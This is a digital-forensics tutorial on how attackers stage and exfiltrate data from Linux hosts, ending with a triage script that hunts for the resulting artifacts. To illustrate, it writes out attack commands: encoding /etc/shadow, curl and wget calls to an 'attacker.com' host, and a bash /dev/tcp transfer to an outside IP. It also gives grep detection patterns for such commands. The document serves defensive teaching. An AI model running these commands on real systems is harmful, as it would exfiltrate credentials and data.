
Artifact Analysis: Linux Data Staging & Exfiltration

Before exfiltrating hundreds of gigabytes of databases or source code, adversaries must aggregate and compress the data to reduce transfer time and evade basic Network Data Loss Prevention (DLP) signatures. This phase is known as “Staging”.

Attackers create massive archive files containing the target directories (/var/www/html, /home, database dumps).

  • Behavioral Artifact: tar -czvf /tmp/backup.tar.gz /var/www/html
  • Encryption: Advanced actors will encrypt the archive to blind network inspection: zip -r -e /dev/shm/secret.zip /home/user (the -e flag prompts for a password; the scriptable -P password variant supplies one inline but leaves it exposed in shell history).
  • Forensic Hunting: Analysts must scan staging directories (/tmp, /var/tmp, /dev/shm) for unusually large files (.tar, .gz, .zip, .7z) or files with suspicious, random extensions.
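The archive hunt above can be sketched as a small helper. hunt_archives is a hypothetical name, and the extension list and size-sorted output are illustrative choices, not a standard tool:

```shell
# Sketch: hunt staging directories on a mounted image for archive files,
# largest first. The extension list is an illustrative starting point.
hunt_archives() {
    # $1: mount point of the forensic image under analysis
    local mount="$1"
    find "$mount/tmp" "$mount/var/tmp" "$mount/dev/shm" -type f \
        \( -name "*.tar" -o -name "*.gz" -o -name "*.zip" -o -name "*.7z" \) \
        -printf '%s\t%p\n' 2>/dev/null | sort -rn   # size (bytes), then path
}
```

Usage against a mounted image would look like `hunt_archives /mnt/analysis`.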

To bypass basic string-matching filters or to exfiltrate binary data over text-only channels (like DNS), attackers often encode sensitive files.

  • Behavioral Artifact: cat /etc/shadow | base64 > /tmp/shadow.b64
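Base64 is trivially reversible, so a recovered .b64 staging file decodes back to the original data byte-for-byte. A minimal round-trip sketch, using a scratch directory and dummy shadow-style content:

```shell
# Round-trip sketch: encode as the attacker would, decode as the analyst
# would, and confirm the bytes match. All paths and content are dummies.
work=$(mktemp -d)
printf 'root:$6$salt$hash:19000:0:99999:7:::\n' > "$work/shadow"
base64 "$work/shadow" > "$work/shadow.b64"          # attacker-side encode
base64 -d "$work/shadow.b64" > "$work/shadow.dec"   # analyst-side decode
cmp -s "$work/shadow" "$work/shadow.dec" && echo "round trip OK"
```

A useful triage heuristic: base64 output is roughly 4/3 the input size, so a suspected .b64 file can be sized against the data it may contain.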

2. Ingress & Egress Vectors (LOLBAS Abuse)

Once the data is staged, or when the attacker needs to download secondary tools (Ingress), they rely on native networking binaries.

Web Clients (curl, wget)

These are the most common vectors.

  • Ingress: wget http://attacker.com/linpeas.sh -O /tmp/check.sh
  • Egress: Attackers can exfiltrate files directly via HTTP POST requests: curl -F "data=@/etc/shadow" http://attacker.com/upload.php
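The egress pattern above leaves distinctive flags in shell history. A hunting sketch (hunt_web_exfil is a hypothetical helper; the regex covers the POST forms shown plus curl's -T/--upload-file and --data-binary upload flags):

```shell
# Sketch: flag web-client upload flags in a recovered history file.
hunt_web_exfil() {
    grep -nE 'curl .*(-F |--form |-T |--upload-file |--data-binary )|wget .*--post-file' "$1"
}
```

On a mounted image this would be pointed at each recovered .bash_history file.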

SSH Tooling (scp, rsync, sftp)

If the attacker controls a remote machine via SSH, they will use these encrypted channels. Network proxies can see the connection but not its contents, so analysts must rely on host artifacts — shell history, new entries in ~/.ssh/known_hosts, and outbound connection telemetry — to detect this.
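One of those host artifacts can be hunted directly: scp/rsync/sftp commands pushing to a remote destination carry a telltale user@host: pattern. A sketch (hunt_ssh_egress is a hypothetical helper):

```shell
# Sketch: surface scp/rsync/sftp pushes to a remote host in one or more
# recovered history files, passed as arguments.
hunt_ssh_egress() {
    grep -nE '\b(scp|rsync|sftp)\b.*[A-Za-z0-9._-]+@[A-Za-z0-9.-]+:' "$@" 2>/dev/null
}
```

Typical invocation: `hunt_ssh_egress /mnt/analysis/home/*/.bash_history /mnt/analysis/root/.bash_history`.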

If a server has been stripped of nc (netcat), curl, or wget for security reasons, attackers can use a built-in feature of the Bash shell to open network sockets directly.

  • The Attack: cat /tmp/secrets.tar.gz > /dev/tcp/198.51.100.45/4444
  • Forensic Challenge: This is a highly stealthy technique. The socket is opened internally by the existing bash process rather than by a dedicated networking tool, so process monitoring sees only benign binaries like cat — never an nc-style utility. Note that /dev/tcp is a bash feature, not a real device file, so it leaves no trace on the filesystem.
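Because /dev/tcp and /dev/udp do not exist as real paths on Linux, their literal appearance in history files or dropped scripts is a high-signal indicator. A detection sketch (hunt_dev_tcp is a hypothetical helper):

```shell
# Sketch: flag bash /dev/tcp//dev/udp pseudo-path usage in one or more
# recovered history files or scripts, passed as arguments.
hunt_dev_tcp() {
    grep -nE '/dev/(tcp|udp)/[^/ ]+/[0-9]+' "$@" 2>/dev/null
}
```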

If standard outbound ports are heavily filtered by the corporate firewall, adversaries adapt using alternative channels.

In modern ransomware and extortion campaigns targeting Linux file servers, rclone has become the attackers' de facto standard exfiltration tool. They download the standalone binary into /tmp and configure it to sync the victim's data directly to attacker-controlled cloud storage (Mega, Google Drive, AWS S3).

  • DFIR Action: Search for rclone configuration files (rclone.conf) or the orphaned binary in temporary directories.
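The DFIR action above can be sketched as a helper that checks both rclone's default config location (~/.config/rclone/rclone.conf) and temp directories on a mounted image. hunt_rclone is a hypothetical name:

```shell
# Sketch: hunt for rclone configs in user homes and orphaned rclone
# binaries in temp directories on a mounted image.
hunt_rclone() {
    local mount="$1"
    find "$mount/home" "$mount/root" -type f -name 'rclone.conf' 2>/dev/null
    find "$mount/tmp" "$mount/var/tmp" -type f -name 'rclone*' 2>/dev/null
}
```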

If the compromised machine is a web server, attackers often skip outbound connections entirely. They simply stage the data inside the web server’s public directory (e.g., mv /tmp/dump.sql /var/www/html/assets/logo.zip) and download it directly through their web browser via standard HTTP GET requests.

  • DFIR Action: Analyze the web server’s access.log for successful downloads (HTTP 200) of unusually large files or strange extensions from the webroot.
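The access.log triage above can be sketched with awk. Field positions ($9 status, $10 response bytes) assume the common Apache/nginx combined log layout; the ~10 MB threshold and the hunt_webroot_exfil name are illustrative:

```shell
# Sketch: print size, client IP, and path for successful (HTTP 200)
# requests larger than ~10 MB in a combined-format access log.
hunt_webroot_exfil() {
    awk '$9 == 200 && $10 + 0 > 10485760 { print $10, $1, $7 }' "$1"
}
```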

When analyzing a mounted forensic image (e.g., at /mnt/analysis/), apply the following triage methodology.

hunt_staging_artifacts.sh
#!/bin/bash
# Triage a mounted forensic image for staging and exfiltration artifacts.
TARGET_DIR="/mnt/analysis"

echo "[+] Hunting for large files (potential staging, > 50MB) in temp dirs..."
find "$TARGET_DIR/tmp" "$TARGET_DIR/var/tmp" "$TARGET_DIR/dev/shm" -type f -size +50M -ls 2>/dev/null

echo "[+] Hunting for orphaned rclone or tunneling binaries..."
# Parentheses are required so -type f and -ls apply to every -name alternative.
find "$TARGET_DIR/tmp" "$TARGET_DIR/var/tmp" -type f \
    \( -name "rclone*" -o -name "ngrok*" -o -name "chisel*" \) -ls 2>/dev/null

echo "[+] Scanning bash history for exfiltration LOLBAS..."
grep -E "curl.*-F|wget.*--post-file|/dev/tcp/|tar.*-czvf|base64" \
    "$TARGET_DIR"/home/*/.bash_history "$TARGET_DIR/root/.bash_history" 2>/dev/null